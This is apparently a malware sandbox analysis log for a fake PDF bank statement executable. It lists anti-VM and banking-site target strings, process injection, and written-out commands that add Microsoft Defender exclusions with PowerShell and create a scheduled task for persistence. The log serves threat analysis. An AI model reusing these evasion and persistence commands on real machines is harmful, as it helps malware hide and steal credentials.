                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597249
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596702
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596355
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596124
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595796
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595687
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595578
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595359
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595249
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595031
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594921
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594812
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594702
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594593
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594478
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594374
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594265
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2611677891.0000000001646000.00000004.00000020.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2606663692.00000000015BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 0000000A.00000002.1526321296.000000000128D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ctio
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                    Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF9548 LdrInitializeThunk,9_2_06FF9548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeMemory written: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeProcess created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
